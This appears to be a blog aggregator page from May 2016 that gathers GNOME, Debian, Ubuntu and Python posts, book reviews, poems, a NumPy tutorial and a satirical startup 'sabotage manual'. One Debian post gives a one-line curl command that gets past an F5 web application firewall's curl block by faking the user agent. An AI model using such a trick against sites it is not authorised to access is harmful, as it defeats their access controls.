Planet Mg

May 16, 2016

Planet GNOME

Amisha Singla: GNOME.Asia Summit 2016 - Planet GNOME

While I was going through news.gnome.org, a piece of news flashed on my screen stating that GNOME.Asia summit 2016 is to be held in Delhi, India which is my own place. Though at that time I was completely unaware about what happens in a summit, what it is meant for and all that sort of questions. But for once, I decided to atleast attend it, if not participate. I told about this news to my mentors Jonas Danielsson and Damian Nohales.  Initially i was quite reluctant to participate there, but Jonas pushed me a lot to present a lightning talk about my outreachy project in the summit. Damian too motivated me to go for the summit. Therefore I decided to submit a lightning talk proposal about my project : "Adding print route support in GNOME-Maps". Within few days i got the confirmation regarding the acceptance of my talk and also the approval of travelling sponsorship.

I was all ready for being the part of the summit and was quite excited to meet people whom I have just known by their nicks on IRC. The summit was held in Manav Rachna International University, Faridabad (India).

Day 1 comprised of workshops. The first session was divided based upon different ways in which one can contribute to GNOME (development, documentation, engagement) and in development it was branched further based on programming languages one was interested in. Because of my interest in javascript, I   joined Cosimo's team. The discussion turned out to be really helpful and cleared a lot of my doubts. Then there was a hands on session on gstreamer taken by Nirbheek and Arun. It was again an interesting one. Meanwhile I made many friends and exchanged talk with them. Above all of it, the community felt like very friendly, interesting and helping.

Day 2 and 3 comprised of a lot of interesting talks by various speakers. It was my first experience to deliver a talk at such a big summit. I was quite scared initially, but it happened all well at the end. I felt glad when I was able to reach out to people and shared the work clearly.

I was not aware of Day 4 plan i.e. excursion trip. But when Shobha (The summit coordinator) asked me to join them, I happily agreed to join them on the trip. It was a fun-filled trip to Taj Mahal, Agra. I got to know a lot about cultures of different countries and made awesome friends.

This summit has been very helpful to get me a feel of GNOME community. After all it's the people who has made it. I am thankful to GNOME community for making me a part of it and the summit. :) Looking forward to more such meets. :)

by Amisha Singla (noreply@blogger.com) at 2016-05-16 07:59

Kevin and Kell

Greta departs - Kevin and Kell

Comic for Monday May 16th, 2016 - "Greta departs" [ view ]

On this day in 1996, after downloading the instructions off the net, Rudy splashes himself with some homemade pheromones to cheat on his test... [ view ]

Today's Daily Sponsor - MB says, "Thanks for K&K, Bill!" [ support ]

by Kevin and Kell at 2016-05-16 05:00

Planet Debian

Russ Allbery: Review: Gentleman Jole and the Red Queen - Planet Debian

Review: Gentleman Jole and the Red Queen, by Lois McMaster Bujold

Series: Vorkosigan #15
Publisher: Baen
Copyright: 2015
Printing: February 2016
ISBN: 1-4767-8122-2
Format: Kindle
Pages: 352

This is very late in the Vorkosigan series, but it's also a return to a different protagonist and a change of gears to a very different type of story. Gentleman Jole and the Red Queen has Cordelia as a viewpoint character for, I believe, the first time since Barrayar, very early in the series. But you would still want to read the intermediate Miles books before this one given the nature of the story Bujold is telling here. It's a very character-centric, very quiet story that depends on the history of all the Vorkosigan characters and the connection the reader has built up with them. I think you have to be heavily invested in this series already to get that much out of this book.

The protagonist shift has a mildly irritating effect: I've read the whole series, but I was still a bit adrift at times because of how long it's been since I read the books focused on Cordelia. I only barely remember the events of Shards of Honor and Barrayar, which lay most of the foundations of this story. Bujold does have the characters retell them a bit, enough to get vaguely oriented, but I'm pretty sure I missed some subtle details that I wouldn't have if the entire series were fresh in memory. (Oh for the free time to re-read all of the series I'd like to re-read.)

Unlike recent entries in this series, Gentleman Jole and the Red Queen is not about politics, investigations, space (or ground) combat, war, or any of the other sources of drama that have shown up over the course series. It's not even about a wedding. The details (and sadly even the sub-genre) are all spoilers, both for this book and for the end of Cryoburn, so I can't go into many details. But I'm quite curious how the die-hard Baen fans would react to this book. It's a bit far afield from their interests.

Gentleman Jole is all about characters: about deciding what one wants to do with one's life, about families and how to navigate them, about boundaries and choices. Choices about what to communicate and what not to communicate, and, partly, about how to maintain sufficient boundaries against Miles to keep his manic energy from bulldozing into things that legitimately aren't any of his business. Since most of the rest of the series is about Miles poking into things that appear to not be his business and finding ways to fix things, it's an interesting shift. It also cast Cordelia in a new light for me: a combination of stability, self-assurance, and careful and thoughtful navigation around others' feelings. Not a lot happens in the traditional plot sense, so one's enjoyment of this book lives or dies on one's investment in the mundane life of the viewpoint characters. It worked for me.

There is also a substantial retcon or reveal about an aspect of Miles's family that hasn't previously been mentioned. (Which term you use depends on whether you think Bujold has had this in mind all along. My money is on reveal.) I suspect some will find this revelation jarring and difficult to believe, but it worked perfectly for me. It felt like exactly the sort of thing that would go unnoticed by the other characters, particularly Miles: something that falls neatly into his blind spots and assumptions, but reads much differently to Cordelia. In general, one of the joys of this book for me is seeing Miles a bit wrong-footed and maneuvered by someone who simply isn't willing to be pushed by him.

One of the questions the Vorkosigan series has been asking since the start is whether anyone can out-maneuver Miles. Ekaterin only arguably managed it, but Gentleman Jole makes it clear that Miles is no match for his mother on her home turf.

This is a quiet and slow book that doesn't feel much like the rest of the series, but it worked fairly well for me. It's not up in the ranks of my favorite books of this series, partly because the way it played out was largely predictable and I never quite warmed to Jole, but Cordelia is delightful and seeing Miles from an outside perspective is entertaining. An odd entry in the series, but still recommended.

Rating: 7 out of 10

by Russ Allbery at 2016-05-16 03:59

Planet Ubuntu

José Antonio Rey: Ubuntu’s back at OSCON this year! - Planet Ubuntu

You read it right! After several years of being absent, Ubuntu is going to be present at OSCON this 2016. We are going to be there as a non-profit, so make sure you visit us at booth 631-3.

It has been several years since we had a presence as exhibitors, and I am glad to say we’re going to have awesome things this year. It’s also OSCON’s first year at Austin. New year, new venue! But getting to the point,  we will have:

  • System76 laptops so you can play and experience with Ubuntu Desktop
  • A couple Nexus 4 phones, so you can try out Ubuntu Touch
  • A bq M10 Ubuntu Edition tablet so you can see how beautiful it is, and see convergence in action (thanks Popey!)
  • A Mycroft! (Thanks to the Mycroft guys, can’t wait to see one in person myself!)
  • Some swag for free (first come-first serve basis, make sure to drop by!)
  • And a raffle for the Official Ubuntu Book, 8th Edition!

The conference starts Monday the 16th May (tomorrow!) but the Expo Hall opens on Tuesday night. You could say we start on Wednesday:) If you are going to be there, don’t forget to drop by and say hi. It’s my first time at OSCON, so we’ll see how the conference is. I am pretty excited about it – hope to see several of you there!


by Planet Ubuntu at 2016-05-16 02:27

QC RSS

Lots Of Negatives - QC RSS


Ads by Project Wonderful! Your ad could be here, right now.

AAAA VanCAF is next weekend! I will be there! You should come say hi and buy stuff from me and my friends!!!!!!

by QC RSS at 2016-05-16 02:02

More Words, Deeper Hole

Nebula Award Winners Announced - More Words, Deeper Hole

The winners are:

Novel

Uprooted, Naomi Novik (Del Rey)
Novella

Binti, Nnedi Okorafor (Tor.com)
Novelette

‘‘Our Lady of the Open Road’’, Sarah Pinsker (Asimov’s 6/15)
Short Story

‘‘Hungry Daughters of Starving Mothers’’, Alyssa Wong (Nightmare 10/15)
Ray Bradbury Award for Outstanding Dramatic Presentation

Mad Max: Fury Road, Written by George Miller, Brendan McCarthy, Nick Lathouris
Andre Norton Award for Young Adult Science Fiction and Fantasy

Updraft, Fran Wilde (Tor)

Other Awards: Gay Haldeman presented the Kevin O’Donnell, Jr. Service to SFWA Award to Dr. Lawrence M. Schoen.

Also posted at Dreamwidth, where there are comment count unavailable comment(s); comment here or there.

by james_nicoll (jdnicoll@panix.com) at 2016-05-16 00:29

May 15, 2016

LWN.net

The 4.6 kernel has been released - LWN.net

Linus has released the 4.6 kernel, saying: "It's just as well I didn't cut the rc cycle short, since the last week ended up getting a few more fixes than expected, but nothing in there feels all that odd or out of line." Some of the more significant changes in this release are: post-init read-only memory as a bare beginning of the effort to harden the kernel, support for memory protection keys, the preadv2() and pwritev2() system calls, the kernel connection multiplexer, the OrangeFS distributed filesystem, compile-time stack validation, the OOM reaper, and many more. See the KernelNewbies 4.6 page for an amazing amount of detail.

by corbet at 2016-05-15 23:11

The Endeavour

Bring out your equations! - The Endeavour

Nice discussion from Fundamentals of Kalman Filtering: A Practical Approach by Paul Zarchan and Howard Musoff:

Often the hardest part in Kalman filtering is the subject that no one talks about—setting up the problem. This is analogous to the quote from the recent engineering graduate who, upon arriving in industry, enthusiastically says, “Here I am, present me with your differential equations!” As the naive engineering graduate soon found out, problems in the real world are frequently not clear and are subject to many interpretations. Real problems are seldom presented in the form of differential equations, and they usually do not have unique solutions.

Whether it’s Kalman filters, differential equations, or anything else, setting up the problem is the hard part, or at least a hard part.

On the other hand, it’s about as impractical to only be able to set up problems as it is to only be able to solve them. You have to know what kinds of problems can be solved, and how accurately, so you can formulate a problem in a tractable way. There’s a feedback loop: provisional problem formulation, attempted solution, revised formulation, etc. It’s ideal when one person can set up and solve a problem, but it’s enough for the formulators and solvers to communicate well and have some common ground.

Related posts:

by John at 2016-05-15 22:53

Planet Debian

Bits from Debian: What does it mean that ZFS is included in Debian? - Planet Debian

Petter Reinholdtsen recently blogged about ZFS availability in Debian. Many people have worked hard on getting ZFS support available in Debian and we would like to thank everyone involved in getting to this point and explain what ZFS in Debian means.

The landing of ZFS in the Debian archive was blocked for years due to licensing problems. Finally, the inclusion of ZFS was announced slightly more than a year ago, on April 2015 by the DPL at the time, Lucas Nussbaum who wrote "We received legal advice from Software Freedom Law Center about the inclusion of libdvdcss and ZFS in Debian, which should unblock the situation in both cases and enable us to ship them in Debian soon.". In January this year, the following DPL, Neil McGovern blogged with a lot of more details about the legal situation behind this and summarized it as "TLDR: It’s going in contrib, as a source only dkms module."

ZFS is not available exactly in Debian, since Debian is only what's included in the "main" section archive. What people really meant here is that ZFS code is now in included in "contrib" and it's available for users using DKMS.

Many people also mixed this with Ubuntu now including ZFS. However, Debian and Ubuntu are not doing the same, Ubuntu is shipping directly pre-built kernel modules, something that is considered to be a GPL violation. As the Software Freedom Conservancy wrote "while licensed under an acceptable license for Debian's Free Software Guidelines, also has a default use that can cause licensing problems for downstream Debian users".

by Ana Guerrero Lopez at 2016-05-15 20:55

Planet Python

Jonathan Hartley: Rhythmbox plugin: “Announce” - Planet Python

I use the Linux music player “Rhythmbox”. This morning I wrote a plugin for it, called “Announce”:

https://github.com/tartley/rhythmbox-plugin-announce

Every time a new song starts to play, it announces the title using speech synthesis. I like it when I’m listening to some new music I’m not familiar with, but am away from the computer. Then I can still know which track is which.

If the album or artist names are different from the previous track, then it includes those in the announcement, too.

by Planet Python at 2016-05-15 19:34

Charlie's Diary

Updating a classic - Charlie's Diary

In 1944, the Office of Strategic Services—the predecessor of the post-war CIA—was concerned with sabotage directed against enemies of the US military. Among their ephemera, declassified and published today by the CIA, is a fascinating document called the Simple Sabotage Field Manual (PDF). It's not just about blowing things up; a lot of its tips are concerned with how sympathizers with the allied cause can impair enemy material production and morale:

  1. Managers and Supervisors: To lower morale and production, be pleasant to inefficient workers; give them undeserved promotions. Discriminate against efficient workers; complain unjustly about their work.
  2. Employees: Work slowly. Think of ways to increase the number of movements needed to do your job: use a light hammer instead of a heavy one; try to make a small wrench do instead of a big one.
  3. Organizations and Conferences: When possible, refer all matters to committees, for "further study and consideration." Attempt to make the committees as large and bureaucratic as possible. Hold conferences when there is more critical work to be done.
  4. Telephone: At office, hotel and local telephone switchboards, delay putting calls through, give out wrong numbers, cut people off "accidentally," or forget to disconnect them so that the line cannot be used again.
  5. Transportation: Make train travel as inconvenient as possible for enemy personnel. Issue two tickets for the same seat on a train in order to set up an "interesting" argument.

Some of these sabotage methods are commonplace tactics deployed in everyday workplace feuds. It's often hard to know where incompetence ends and malice begins: the beauty of organizations is that most of them have no effective immune systems against such deliberate excesses of incompetence.

So it occured to me a week or two ago to ask (on twitter) the question, "what would a modern-day version of this manual look like if it was intended to sabotage a rival dot-com or high tech startup company"? And the obvious answer is "send your best bad managers over to join in admin roles and run their hapless enemy into the ground". But what actual policies should they impose for best effect?

  1. Obviously, engineers and software developers (who require deep focus time) need to be kept in touch with the beating heart of the enterprise. So open-plan offices are mandatory for all.

  2. Teams are better than individuals and everyone has to be aware of the valuable contributions of employees in other roles. So let's team every programmer with a sales person—preferably working the phones at the same desk—and stack-rank them on the basis of each pair's combined quarterly contribution to the corporate bottom line.

  3. It is the job of Human Resources to ensure that nobody rocks the boat. Anyone attempting to blow whistles or complain of harrassment is a boat-rocker. You know what needs to be done.

  4. Senior managers should all be "A" Players (per Jack Welch's vitality model—see "stack ranking" above) so we should promote managers who are energetic, inspirational, and charismatic risk-takers.

  5. The company must have a strong sense of intense focus. So we must have a clean desk policy—any personal possessions left on the desk or cubicle walls at the end of the day go in the trash. In fact, we can go a step further and institute hot desking—we will establish an average developer's workstation requirements and provide it for everyone at every desk.

  6. All work environments must be virtualized and stashed on the corporate file servers for safe-keeping. Once we've worked out how many VMs we need to run, we can get rid of the surplus hardware—redundancy is wasteful.

  7. Programmers don't need root/admin access to their development environments. Marketing, however, need to be able to manage the CRM and should have global admin permissions across the network.

  8. All communications within the company will be conducted using the corporation's own home-rolled secure instant messaging/email system. IT Services are hard at work porting the PocketPC 2006 Second Edition client to Android 2.2 and Windows Vista; it should be available any day now, at which point the iPaqs and XP boxes will be sunsetted. (This has the added benefit of preventing the developers from sneaking Macs or Linux systems into the office.)

  9. Stand-up meetings will be scheduled every morning, to allow the development team to share insights and situational awareness. To ensure that everybody has their say everybody will be allocated exactly the same amount of time to speak. If they don't have anything to fill the silence with, we will wait it out, to encourage slow thinkers to keep up.

  10. If a project is running late, then everybody in the department will move to a death-march overtime tempo and pitch in until it's done, shelving their own jobs and switching tasks if necessary. If a death march is established and still fails to produce deliverables on time, then as punishment the coffee in the departmental cafetiere will be switched to decaff.



Okay. What can you add to this dot-com sabotage manual? (No more than bullet point per comment, no more than three comments per day—so there's room for everyone! Alan, this is your cue for variations on full-stack Javascript plus NoSQL ...)

by Charlie Stross at 2016-05-15 17:49

Making Light

Serving and protecting - Making Light

Another day, another video of police beating and tasing civilians, in this case a 15-year-old Tacoma girl who cut across...

by Patrick Nielsen Hayden at 2016-05-15 17:27

Bluejo's Journal

Sunday Morning, Saint Malo, Two sonnets - Bluejo's Journal

1. Joy

It's early Sunday, down here on the sand
There's no horizon, only shades of blue
Dotted with islands, and the inland view
Two castles, one cathedral, and the strand.

The sea-washed sand-grains glitter like panned gold
And sailing out, a single white-sailed yacht
And its reflection -- and how have I got
So lucky, to have this to see and hold.

How did my life lead here, so I could be
Here in this town, this life, this world, these friends,
This early morning walk beside the sea?

So lucky, lucky that my life now lends
This joy of being here, and being free
To see and love so much, before all ends.

2. Sorrow.

I met a woman walking in the waves
"Bonjour," "Bonjour," "Vous etes Anglais?"
"Oui, suis," and then a tale burst out a weird way
I couldn't understand, that featured graves.

She asked was I a writer, I "I am,"
And then she told me that her son had died.
To illness. He was ten. And then she cried.
And I said "Ah! Je n'ai pas mots, Madame."

No words in French or English actually
In face of such a grief, nothing that may
Reach out across the gulf from her to me.

"J'ai perdu ma soeur, a onze. Je sais.
Nous oublies jamais." I said. The sea
Kept making waves. And she said "Oui. Jamais."

All totally true, including my utterly crap French, which I have deliberately left as it is. Actually our conversation was slightly longer -- she recognised the festival ribbon and asked if I was here for Etonnants Voyageurs before she asked whether I was a writer.

I sat down on the steps and wrote these in my notebook on the beach, and got the seat of my pants slightly wet, but it was worth it.

Sponsored by the wonderful Patrons of my Patreon.

by Bluejo's Journal (bluejo@gmail.com) at 2016-05-15 17:25

Making Light

On sale, um, now, Harry Turtledove's The House of Daniel - Making Light

[Yes, this post should have gone up on April 21. See Available in hardcover and e-book. Excerpt here. My...

by Patrick Nielsen Hayden at 2016-05-15 16:15

More Words, Deeper Hole

Dune by Frank Herbert - More Words, Deeper Hole



Dune by Frank Herbert

Also posted at Dreamwidth, where there are comment count unavailable comment(s); comment here or there.

by james_nicoll (jdnicoll@panix.com) at 2016-05-15 14:39

Planet Python

Python 4 Kids: Python for Kids Book: Project 5 - Planet Python

In these posts I outline the contents of each project in my book Python For Kids For Dummies.  If you have questions or comments about the project listed in the title post them here. Any improvements will also be listed here.

What’s in Project 5

Project 5 introduces functions by revisiting the Guessing Game from Project 3 and recasting it using a function.  The project covers the def keyword, calling a function, the fact that a function must be defined before it can be called. The project also covers how to communicate with a function (both sending information to it by passing parameters and getting information from it, using the return keyword). In order to define a function, you need to give it a name, so the project sets out naming rules for functions. You should also be documenting your code, so the project introduces docstrings, how to create them, what to put in them and how to use them.

The project illustrates a logical problem in the code an explains what a local variable is. It introduces the concept of constants defined in the body of a program that can be accessed by code within a function.  A function which conducts the game round is put inside a while loop. The user interface is changed to allow the user to exit the loop.  This involves creating a quit function which first checks with the user to confirm that they want to quit, then using the break keyword to break out of the loop to quit, or the continue keyword if the user aborts the quit. The sys module is introduced in order to use sys.exit.

Improvements:

The name of the project is actually “A More Functional Guessing Game” – named as such since it will be using a function to make the guessing game work better, but some editor somewhere had a humor transplant and changed that title.

The callout on Figure 5-4 should read “The right place for an argument.”  They completely ruined that pun <sigh>


by Planet Python at 2016-05-15 13:06

Python 4 Kids: Python for Kids: Python 3 – Project 4 - Planet Python

Disclaimer

Some people want to use my book Python for Kids for Dummies to learn Python 3. I am working through the code in the existing book, highlighting changes from Python 2 to Python 3 and providing code that will work in Python 3.

If you are using Python 2.7 you can ignore this post. This post is only for people who want to take the code in my book Python for Kids for Dummies and run it in Python 3.

Using Python3 in Project 4 of Python For Kids For Dummies

Project 4 introduces the IDLE integrated development environment. When you download and install a version of Python 3 for Windows (I tested version 3.4.4)  you should get a folder called Python 3.4 (or whatever version you installed) in your Start Menu.  In that folder should be an entry called IDLE (Python 3.4 GUI – 32 bit).  If you run that you will be launched into the Python 3.4 equivalent of the IDLE mentioned in the book.

The good news is that pretty much everything in this project is the same for Python 3. That’s partly because the project is mainly concerned with introducing the IDLE environment and the concept of storing code in a file.  IDLE in Python 3 has all of the features listed in Project 4 as for Python 2.7:

Syntax highlighting (page 87)

Tab Completion (page 88/89)

Command history (page 90/91)

The IDLE Editor Window (page 92-95)

Comments (page 95-98)

Saving files (page 98)

Commenting out code (page 98-100) (the same commenting format -> # or triple quotes for docstrings “”” are the same in Python 3)

Indenting and dedenting code (page 101-102)

You should be able to breeze through Project 4 using Python 3.


by Planet Python at 2016-05-15 13:00

Planet Debian

Sven Hoexter: Failing with F5: ASM default ruleset vs curl - Planet Debian

Not sure what to say on days when the default ruleset of an "web application firewall" denies access for curl, and the circumvention is as complicated as:

alias curl-vs-asm="curl -A 'Mozilla'"

It starts to feel like wasting my lifetime when I see something like that. Otherwise I like my job (that's without irony!).

Update: Turns out it's even worse. They specifically block curl. Even

curl -A 'A' https://wherever-asm-is-used.example

works.

by Sven Hoexter at 2016-05-15 11:16

Planet Python

Giampaolo Rodola: psutil 4.2.0, Windows services and Python - Planet Python

New psutil 4.2.0 is out. The main feature of this release is the support for Windows services:

>>> import psutil
>>> list(psutil.win_service_iter())
[<WindowsService(name='AeLookupSvc', display_name='Application Experience') at 38850096>,
<WindowsService(name='ALG', display_name='Application Layer Gateway Service') at 38850128>,
<WindowsService(name='APNMCP', display_name='Ask Update Service') at 38850160>,
<WindowsService(name='AppIDSvc', display_name='Application Identity') at 38850192>,
...]
>>> s = psutil.win_service_get('alg')
>>> s.as_dict()
{'binpath': 'C:\\Windows\\System32\\alg.exe',
'description': 'Provides support for 3rd party protocol plug-ins for Internet Connection Sharing',
'display_name': 'Application Layer Gateway Service',
'name': 'alg',
'pid': None,
'start_type': 'manual',
'status': 'stopped',
'username': 'NT AUTHORITY\\LocalService'}

I did this mainly because I find pywin32 APIs too low level. Having something like this in psutil can be useful to discover and monitor services more easily. The code changes are here and here's the doc. The API for querying a service is similar to psutil.Process. You can get a reference to a service object by using its name (which is unique for every service) and then use name(), status(), etc..:

>>> s = psutil.win_service_get('alg')
>>> s.name()
'alg'
>>> s.status()
'stopped'

Initially I thought to expose and provide a complete set of APIs to handle all aspects of service handling including start(), stop(), restart(), install(), uninstall() and modify() but I soon realized that I would have ended up reimplementing what pywin32 already provides at the cost of overcrowding psutil API (see my reasoning here). I think psutil should really be about monitoring, not about installing and modifying system stuff, especially something as critical as a Windows service.

Considerations about Windows services

For those of you who are not familiar with Windows, a service is something, generally an executable (.exe), which runs at system startup and keeps running in background. We can say they are the equivalent of a UNIX init script. All service are controlled by a "manager" which keeps track of their status and metadata (e.g. description, startup type) and with that you can start and stop them. It is interesting to note that since (most) services are bound to an executable (and hence a process) you can reference the process via its PID:

>>> s = psutil.win_service_get('sshd')
>>> s
<WindowsService(name='sshd', display_name='Open SSH server') at 38853046>
>>> s.pid()
1865
>>> p = psutil.Process(1865)
>>> p
<psutil.Process(pid=19547, name='sshd.exe') at 140461487781328>
>>> p.exe()
'C:\CygWin\bin\sshd'

Other improvements

psutil 4.2.0 comes with 2 other enhancements for Linux:
  • psutil.virtual_memory() returns a new "shared" memory field. This is the same value reported by "free" cmdline utility.
  • I changed the way how /proc was parsed. Instead of reading /proc/{pid}/status line by line I used a regular expression. Here's the speedups:
    * Process.ppid() is 20% faster
    * Process.status() is 28% faster
    * Process.name() is 25% faster
    * Process.num_threads() is 20% faster (on Python 3 only; on Python 2 it's a bit slower - I
       suppose re module received some improvements)

Links

by Planet Python at 2016-05-15 10:37

Kevin and Kell

Next year's roommate - Kevin and Kell

Comic for Sunday May 15th, 2016 - "Next year's roommate" [ view ]

On this day in 1997, Rudy found himself in the awkward situation of coaching Ms. Aura through the birth of her baby hatchling, Nigel... [ view ]

Today's Daily Sponsor - MB says, "Thanks for K&K, Bill!" [ support ]

by Kevin and Kell at 2016-05-15 05:00

Planet Debian

Norbert Preining: Foreigners in Japan are evil … - Planet Debian

…at least what Tokyo Shinjuku ward belives. They have put out a very nice brochure about how to behave as a foreigner in Japan: English (local copy) and Japanese (local copy). Nothing in there is really bad, but the tendency is so clear that it makes me think – what on earth do you believe we are doing in this country?
foreigners

Now what is so strange on that? And if you have never lived in Japan you will probably not understand. But reading through this pamphlet I felt like a criminal from the first page on. If you don’t want to read through it, here a short summary:

  • The first four pages (1-4) deal with manner, accompanying penal warnings for misbehavior.
  • Pages 5-16 deal with criminal records, stating the amount of imprisonment and fines for strange delicti.
  • Pages 17-19 deal with residence card, again paired with criminal activity listings and fines.
  • Pages 20-23 deal with reporting obligations, again ….
  • And finally page 24 gives you phone numbers for accidents, fires, injury, and general information.

So if you count up, we have 23 pages of warnings, and 1 (as in *one*) page of practical information. Do I need to add more about how we foreigners are considered in Japan?

Just a few points about details:

  • In the part on manner, not talking on the phone in public transport is mentioned – I have to say, after many years here I am still waiting to see the first foreigner talking on the phone loudly, while Japanese regularly chat away at high volume.
  • Again in the manner section, don’t make noise in your flat – well, I lived 3 years in an apartment where the one below me enjoyed playing loud music in the car till late in the night, as well as moving furniture at 3am.
  • Bicycle riding – ohhhh, bicycle riding – those 80+ people meandering around the street, and the school kids driving 4 next to each other. But hey, we foreigners are required to do differently. Not that any police officer ever stopped a Japanese school kid for that …
  • I just realized that I was doing illegal things for long time – withdrawing money using someone else’s cash card! Damned, it was my wife’s, but still, too bad 🙁

I accept the good intention of the Shinjuku ward to bring forth a bit of warnings and guidance. But the way it was done – it speaks volumes about how we foreigners are treated – second class.

by Norbert Preining at 2016-05-15 03:07

More Words, Deeper Hole

The Cougar's Mighty Roar - More Words, Deeper Hole



Also posted at Dreamwidth, where there are comment count unavailable comment(s); comment here or there.

by james_nicoll (jdnicoll@panix.com) at 2016-05-15 02:49

Planet Debian

Jonathan Dowland: Announcement - Planet Debian

It has become a bit traditional within Debian to announce these things in a geeky manner, so for now

# ed -p: /etc/exim4/virtual/dow.land
:a
holly: :fail: reserved for future use
.
:wq
99

More soon!

by jmtd at 2016-05-15 02:11

Dirk Eddelbuettel: Rcpp 0.12.5: Yet another one - Planet Debian

The fifth update in the 0.12.* series of Rcpp has arrived on the CRAN network for GNU R a few hours ago, and was just pushed to Debian. This 0.12.5 release follows the 0.12.0 release from late July, the 0.12.1 release in September, the 0.12.2 release in November, the 0.12.3 release in January, and the 0.12.4 release in March --- making it the ninth release at the steady bi-montly release frequency. This release is one again more of a maintenance release addressing a number of small bugs, nuisances or documentation issues without adding any major new features.

Rcpp has become the most popular way of enhancing GNU R with C or C++ code. As of today, 662 packages on CRAN depend on Rcpp for making analytical code go faster and further. That is up by almost fifty packages from the last release in late March!

And as during the last few releases, we have first-time committers. we have new first-time contributors. Sergio Marques helped to enable compilation on Alpine Linux (with its smaller libc variant). Qin Wenfeng helped adapt for Windows builds under R 3.3.0 and the long-awaited new toolchain. Ben Goodrich fixed a (possibly ancient) Rcpp Modules bug he encountered when working with rstan. Other (recurrent) contributor Dan Dillon cleaned up an issue with Nullable and strings. Rcpp Core team members Kevin and JJ took care of small build nuisance on Windows, and I added in a new helper function, updated the skeleton generator and (finally) formally deprecated loadRcppModule() for which loadModule() has been preferred since around R 2.15 or so. More details and links are below.

Changes in Rcpp version 0.12.5 (2016-05-14)

  • Changes in Rcpp API:

    • The checks for different C library implementations now also check for Musl used by Alpine Linux (Sergio Marques in PR #449).

    • Rcpp::Nullable works better with Rcpp::String (Dan Dillon in PR #453).

  • Changes in Rcpp Attributes:

    • R 3.3.0 Windows with Rtools 3.3 is now supported (Qin Wenfeng in PR #451).

    • Correct handling of dependent file paths on Windows (use winslash = "/").

  • Changes in Rcpp Modules:

    • An apparent race condition in Module loading seen with R 3.3.0 was fixed (Ben Goodrich in #461 fixing #458).

    • The (older) loadRcppModules() is now deprecated in favour of loadModule() introduced around R 2.15.1 and Rcpp 0.9.11 (PR #470).

  • Changes in Rcpp support functions:

    • The Rcpp.package.skeleton() function was again updated in order to create a DESCRIPTION file which passes R CMD check without notes. warnings, or error under R-release and R-devel (PR #471).

    • A new function compilerCheck can test for minimal g++ versions (PR #474).

Thanks to CRANberries, you can also look at a diff to the previous release. As always, even fuller details are on the Rcpp Changelog page and the Rcpp page which also leads to the downloads page, the browseable doxygen docs and zip files of doxygen output for the standard formats. A local directory has source and documentation too. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

by Dirk Eddelbuettel at 2016-05-15 01:54

Planet Python

Jamal Moir: An Introduction to Scientific Python (and a Bit of the Maths Behind It) - NumPy - Planet Python


Oh the amazing things you can do with Numpy.

NumPy is a blazing fast maths library for Python with a heavy emphasis on arrays. It allows you to do vector and matrix maths within Python and as a lot of the underlying functions are actually written in C, you get speeds that you would never reach in vanilla Python.

Numpy is an absolutely key piece to the success of scientific Python and if you want to get into Data Science and or Machine Learning in Python, it's a must learn. NumPy is well built in my opinion and getting started with it is not difficult at all.

This is the second post in a series of posts on scientific Python, don't forget to check out the others too. An up-to-date list of posts in this series is at the bottom of this post.

ARRAY BASICS

Creation

NumPy revolves around these things called arrays. Actually nparrays, but we don't need to worry about that. With these arrays we can do all sorts of useful things like vector and matrix maths at lightning speeds. Get your linear algebra on! (Just kidding we won't be doing any heavy maths)

# 1D Array
a = np.array([0, 1, 2, 3, 4])
b = np.array((0, 1, 2, 3, 4))
c = np.arange(5)
d = np.linspace(0, 2*np.pi, 5)

print(a) # >>>[0 1 2 3 4]
print(b) # >>>[0 1 2 3 4]
print(c) # >>>[0 1 2 3 4]
print(d) # >>>[ 0. 1.57079633 3.14159265 4.71238898 6.28318531]
print(a[3]) # >>>3
The above code shows 4 different ways of creating an array. The most basic way is just passing a sequence to NumPy's array() function; you can pass it any sequence, not just lists like you usually see.

Notice how when we print an array with numbers of different length, it automatically pads them out. This is useful for viewing matrices. Indexing on arrays works just like that of a list or any other of Python's sequences. You can also use slicing on them, I won't go into slicing a 1D array here, if you want more information on slicing, check out this post.

The above array example is how you can represent a vector with NumPy, next we will take a look at how we can represent matrices and more with multidimensional arrays.

# MD Array,
a = np.array([[11, 12, 13, 14, 15],
[16, 17, 18, 19, 20],
[21, 22, 23, 24, 25],
[26, 27, 28 ,29, 30],
[31, 32, 33, 34, 35]])

print(a[2,4]) # >>>25
To create a 2D array we pass the array() function a list of lists (or a sequence of sequences). If we wanted a 3D array we would pass it a list of lists of lists, a 4D array would be a list of lists of lists of lists and so on.

Notice how with a 2D array (with the help of our friend the space bar), is arranged in rows and columns. To index a 2D array we simply reference a row and a column.

A Bit of the Maths Behind It

To understand this properly, we should really take a look at what vectors and matrices are.

A vector is a quantity that has both direction and magnitude. They are often used to represent things such as velocity, acceleration and momentum. Vectors can be written in a number of ways although the one which will be most useful to us is the form where they are written as an n-tuple such as (1, 4, 6, 9). This is how we represent them in NumPy.

A matrix is similar to a vector, except it is made up of rows and columns; much like a grid. The values within the matrix can be referenced by giving the row and the column that it resides in. In NumPy we make arrays by passing a sequence of sequences as we did previously.



Multidimensional Array Slicing

Slicing a multidimensional array is a bit more complicated than a 1D one and it's something that you will do a lot while using NumPy.

# MD slicing
print(a[0, 1:4]) # >>>[12 13 14]
print(a[1:4, 0]) # >>>[16 21 26]
print(a[::2,::2]) # >>>[[11 13 15]
# [21 23 25]
# [31 33 35]]
print(a[:, 1]) # >>>[12 17 22 27 32]
As you can see you slice a multidimensional array by doing a separate slice for each dimension separated with commas. So with a 2D array our first slice defines the slicing for rows and our second slice defines the slicing for columns.

Notice that you can simply specify a row or a column by entering the number. The first example above selects the 0th column from the array.

The diagram below illustrates what the given example slices do.


Array Properties

When working with NumPy you might want to know certain things about your arrays. Luckily there are lots of handy methods included within the package to give you the information that you need.

# Array properties
a = np.array([[11, 12, 13, 14, 15],
[16, 17, 18, 19, 20],
[21, 22, 23, 24, 25],
[26, 27, 28 ,29, 30],
[31, 32, 33, 34, 35]])

print(type(a)) # >>><class 'numpy.ndarray'>
print(a.dtype) # >>>int64
print(a.size) # >>>25
print(a.shape) # >>>(5, 5)
print(a.itemsize) # >>>8
print(a.ndim) # >>>2
print(a.nbytes) # >>>200
As you can see in the above code a NumPy array is actually called an ndarray. I don't know why it's called an ndarray, if anyone knows please leave a comment! My guess is that it stands for n dimensional array.

The shape of an array is how many rows and columns it has, the above array has 5 rows and 5 columns so its shape is (5, 5).

